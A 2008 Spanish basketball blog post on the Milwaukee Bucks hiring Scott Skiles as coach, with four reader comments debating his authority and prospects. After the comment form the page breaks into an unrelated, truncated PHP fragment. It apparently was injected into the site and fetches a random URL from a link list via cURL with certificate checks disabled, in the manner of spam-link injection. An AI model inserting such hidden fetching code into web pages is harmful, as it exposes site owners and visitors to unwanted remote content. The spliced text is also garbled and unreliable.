Skiles acude al rescate de los Bucks

22 de April de 2008 por Gallis

Menos de una semana después de despedir a Larry Krystkowiak, el banquillo de los Bucks ya tiene nuevo inquilino. Se trata de Scott Skiles, una de las piezas más codiciadas por casi todos los equipos que andan buscando estos días un nuevo entrenador que reconduzca sus destinos. Tras las apuestas por Terry Stotts y Larry Krystkowiak, ambos debutantes en el puesto de Head Coach, los de Milwaukee han vuelto a recurrir a un nombre con experiencia para tratar de solventar sus problemas.  Skiles, que como jugador fue elegido por los Bucks en el draft del 86, ha entrenado con anterioridad a los Phoenix Suns y a los Chicago Bulls. A ambos equipos los cogió en malos momentos y fue capaz de sacarlos adelante, con mayor o menor éxito. Sin embargo, el nuevo jefe de los Bucks viene de vivir sin duda su peor temporada en los banquillos, ya que el año pasado fue destituido por los Bulls a mediados del  mes de diciembre, pese a comenzar la temporada como uno de los máximos candidatos al anillo en la conferencia este.

Skiles ha firmado para los próximos 4 años, un período en el que le espera mucho trabajo. Y es que, como ya os hemos contado en este blog, la temporada de los Bucks ha sido una de las grandes decepciones de la liga. Aspirantes a Playoffs, los Bucks tan solo han sido capaces de ganar 26 partidos. Han demostrado estar muy lejos de ser un verdadero equipo y, consecuencia lógica de ello, han sido una de los peores ataques y una de las peores defensas de la liga. Muchos son los problemas con los que tendrá que lidiar: La polémica sobre la titularidad de Li Jianlian, el malestar de Charlie Villanueva y el de Charlie Bell o las dudas que ha despertado el liderazgo de Redd son solo algunos de ellos. Esta vez tendrá que afinar más, ya que en su época en Chicago no tuvo mucho éxito a la hora de afrontar sus enfrentamientos con Ben Wallace, alguno de sus rookies o tratando de evitar que los problemas contractuales de Deng y Gordon les distrajeran. Skiles llega con su fama de tipo duro (así lo atestigua su pelea con Shaquille O´Neal en un entrenamiento de los Orlando Magic, hecho que ayer confirmó el propio Skiles durante su presentación) a dirigir una de las plantillas con mayor abundancia de jugadores, por así decirlos, suaves. Mucho trabajo duro por delante. Quizá demasiado.

Comenta

4 comentarios a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Puede ser que Skiles sea a los Bucks, como koeman haya sido al Valencia??

      Citar

  2. Elio dice:
    #2

    Al rescate o a echarles una mano al cuello. No me gusta nada este entrenador, de autoridad nada. Ben Wallace jugó con cinta en la caebza porque le salió de ahí estando prohibido en los Bulls. Autoridad es lo que tenia Jackson en los Bulls de los 90 cuando Rodman un día pegaba una patada a un fotografo, otro día salia en Playboy haciendo declaraciones fuera de tono, otro participaba en peleas de Lucha Libre… Y los Bulls 3 años campeones seguidas con ese elemento estabilizador dentro de la cancha y desestabilizador fuera.

    Skiles no cumplirá los 4 años de contrato a no ser que los Bucks quieran seguir por el penoso camino por el que andan desde hace ahora 30 años, que se dice pronto…

      Citar

  3. Viva_Dirk dice:
    #3

    La verdad es que no parece el entrenador mas adecuado, pero quien sabe, si tienen suerte en el draft y los ‘potenciales’ explotan todo puede pasar.

    Una cosa si creo que va a hacer Skiles y es llevar el equipo a play-offs o muy cerca en un par de años, hasta la fecha ha demostrado muy poco en play-offs.

      Citar

  4. txusma dice:
    #4

    El año pasado Skiles hizo un buen trabajo con los Bulls y nada hace pensar que no puedo volver a hacerlo en los Bucks. Ademas las plantillas creo q son parecidas: mucho talento, mucho buen jugador pero ninguna super estrella.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>